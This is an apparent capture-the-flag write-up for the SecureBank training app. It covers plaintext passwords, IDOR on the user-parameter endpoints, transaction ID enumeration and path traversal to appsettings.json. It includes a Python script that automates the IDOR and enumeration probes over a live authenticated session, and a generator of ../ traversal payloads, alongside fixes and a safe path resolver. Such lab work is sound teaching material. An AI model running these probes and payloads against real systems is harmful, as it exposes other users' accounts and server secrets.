Challenges
To solve these challenges, we need to manually look inside the requests of SecureBank.
In case of a database breach, every user's password is leaked. Because the server stores passwords in plaintext, the attacker does not even have to brute-force password hashes. Passwords should always be salted and then hashed with a strong, deliberately slow password-hashing algorithm, so that a stolen table still protects our users as well as possible.
We can immediately see two network requests in which the username is passed as a parameter.
This request accepts a username and returns the balance of that account. By changing the username, we can get the account balance of other users.
In the request, change the user parameter: /User/GetAvailbleFunds?user={username}
In this challenge, you need to get another user's profile image.
In the request, change user to the desired username: /User/ProfileImage?user={username}
The project is built with an MVC CRUD pattern. If we only look at the requests filtered on the table page, we might miss the enumeration of the models produced by the CRUD pattern. In our case, the transactions in the first table are filtered to the logged-in user. When choosing an action, we notice an ID in the URL. If we change that ID, we can enumerate it and view every transaction created in SecureBank.
Go to /Transaction/Details/{transaction id} and change the transaction id until you get a transaction that belongs to another user.
You will find the flag in the response header.
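The two user-parameter requests and the transaction ID enumeration above are the same test: request an object while varying the identifier, and keep the responses that the server should have refused. The script below is an added example (not part of SecureBank or this write-up) that automates both. The HTTP transport is pluggable: `fake_fetch` is a constructed in-memory stand-in with made-up users, balances and a placeholder `X-Demo-Flag` header so the code runs offline, and `http_fetch` builds the same interface over a live authenticated session with the standard library. The "belongs to another user" heuristic (our own username does not appear in the details page) is an assumption you may need to adjust to the real page content.

```python
from typing import Callable, Dict, Iterable, Tuple
from urllib.parse import parse_qs, urlencode, urlparse

# A response is (status, headers, body); a fetch takes a path plus query relative to
# the SecureBank host and returns one. Keeping the transport pluggable lets the
# probes run against the constructed stand-in below or a live session.
Response = Tuple[int, Dict[str, str], str]
Fetch = Callable[[str], Response]


def probe_user_param(fetch: Fetch, path: str, my_user: str,
                     candidates: Iterable[str]) -> Dict[str, str]:
    """Request path?user=<candidate> for every candidate and return those that
    answered 200 with a body different from our own account's response.
    Works for /User/GetAvailbleFunds and /User/ProfileImage alike."""
    _, _, my_body = fetch(f"{path}?{urlencode({'user': my_user})}")
    hits: Dict[str, str] = {}
    for user in candidates:
        if user == my_user:
            continue
        status, _, body = fetch(f"{path}?{urlencode({'user': user})}")
        if status == 200 and body != my_body:
            hits[user] = body
    return hits


def enumerate_transactions(fetch: Fetch, my_user: str,
                           ids: Iterable[int]) -> Dict[int, Response]:
    """Walk /Transaction/Details/{id} and keep every 200 whose page does not
    mention our own username, i.e. a transaction the filtered table never showed
    us. The whole response is kept because the flag lives in a header."""
    found: Dict[int, Response] = {}
    for tid in ids:
        status, headers, body = fetch(f"/Transaction/Details/{tid}")
        if status == 200 and my_user not in body:
            found[tid] = (status, headers, body)
    return found


# --- constructed stand-in for SecureBank so the probes run offline (not the real app) ---
FAKE_FUNDS = {"alice": "120.00", "bob": "9999.00"}
FAKE_TRANSACTIONS = {1: "alice", 2: "bob", 3: "carol"}  # transaction id -> owner


def fake_fetch(path_and_query: str) -> Response:
    url = urlparse(path_and_query)
    if url.path == "/User/GetAvailbleFunds":
        user = parse_qs(url.query).get("user", [""])[0]
        return (200, {}, FAKE_FUNDS[user]) if user in FAKE_FUNDS else (404, {}, "")
    if url.path.startswith("/Transaction/Details/"):
        try:
            tid = int(url.path.rsplit("/", 1)[1])
        except ValueError:
            return 400, {}, ""
        if tid in FAKE_TRANSACTIONS:
            owner = FAKE_TRANSACTIONS[tid]
            # X-Demo-Flag is a placeholder header for this stand-in only.
            return 200, {"X-Demo-Flag": f"flag-for-{tid}"}, f"Transaction {tid} for {owner}"
        return 404, {}, ""
    return 404, {}, ""


def http_fetch(base_url: str, cookie: str) -> Fetch:
    """Build a fetch over a live session with the standard library only. `cookie`
    is the authenticated session cookie copied from the browser."""
    import urllib.error
    import urllib.request

    def fetch(path_and_query: str) -> Response:
        req = urllib.request.Request(base_url.rstrip("/") + path_and_query,
                                     headers={"Cookie": cookie})
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status, dict(resp.headers), resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            return err.code, dict(err.headers), ""
    return fetch


if __name__ == "__main__":
    print(probe_user_param(fake_fetch, "/User/GetAvailbleFunds", "alice",
                           ["alice", "bob", "nobody"]))
    for tid, (_, headers, _) in enumerate_transactions(fake_fetch, "alice", range(1, 6)).items():
        print(tid, headers)
```

Against the real target, replace `fake_fetch` with `http_fetch("http://<securebank-host>", "<session cookie>")` and feed a sensible ID range; the server-side fix for all three endpoints is the same, which is to look the object up by the authenticated user's identity rather than by a client-supplied name or ID.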
Looking further into the requests, we notice that ProfileImage returns a file. Changing the username to a file path immediately produces unusual behavior. Knowing that this is a .NET Core application, we can try to retrieve the appsettings.json file at ../appsettings.json or ../../appsettings.json, depending on how the application is hosted.
You know that the application framework is .NET Core, so you are looking for appsettings.json.
Go to /api/User/ProfileImage?user={username} and, depending on how the application is hosted, set user to ../appsettings.json or ../../appsettings.json.
You will find the flag in the response header.
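The bug here is that the handler joins the user parameter straight onto the image directory, so `..` segments walk out of it. The following added example (not code from SecureBank or this write-up) generates the traversal payloads to try, including a backslash variant for Windows hosting beyond the two paths the write-up gives, and sets an assumed vulnerable join beside a resolver that canonicalizes the path and refuses anything outside the image directory. The directory name `/srv/securebank/wwwroot/images` is made up for the demonstration.

```python
import os
from typing import List, Optional


def traversal_candidates(target: str, max_depth: int = 4) -> List[str]:
    """Values to try in the user parameter: '../' chains of increasing depth, since
    the number of hops depends on where the app is hosted, plus '..\\' for a
    Windows host. Depth 1 and 2 are the write-up's two payloads."""
    payloads: List[str] = []
    for depth in range(1, max_depth + 1):
        payloads.append("../" * depth + target)
        payloads.append("..\\" * depth + target)
    return payloads


def vulnerable_resolve(image_dir: str, user: str) -> str:
    """Assumed shape of the vulnerable handler: the user parameter is appended to
    the image directory with no validation, so '../appsettings.json' leaves it."""
    return os.path.join(image_dir, user)


def safe_resolve(image_dir: str, user: str) -> Optional[str]:
    """Canonicalize the joined path and accept it only if it is still strictly
    inside image_dir. Returns None (reject the request) otherwise."""
    base = os.path.abspath(image_dir)
    target = os.path.abspath(os.path.join(base, user))
    if target == base or os.path.commonpath([base, target]) != base:
        return None
    return target


def traversal_escapes(image_dir: str, user: str) -> bool:
    """True when the naive join would resolve outside image_dir."""
    return safe_resolve(image_dir, user) is None


if __name__ == "__main__":
    image_dir = "/srv/securebank/wwwroot/images"  # made-up directory
    for payload in traversal_candidates("appsettings.json", max_depth=2):
        print(f"{payload!r:32} naive -> {os.path.normpath(vulnerable_resolve(image_dir, payload))}"
              f"  safe -> {safe_resolve(image_dir, payload)}")
    print(safe_resolve(image_dir, "alice.png"))
```

Note that `safe_resolve` also rejects an absolute path in the parameter, because `os.path.join` discards the base when the second argument is absolute and the canonical result then fails the prefix check. In the .NET Core app the equivalent check is to build the full path, canonicalize it, and verify it starts with the canonical image directory before opening the file.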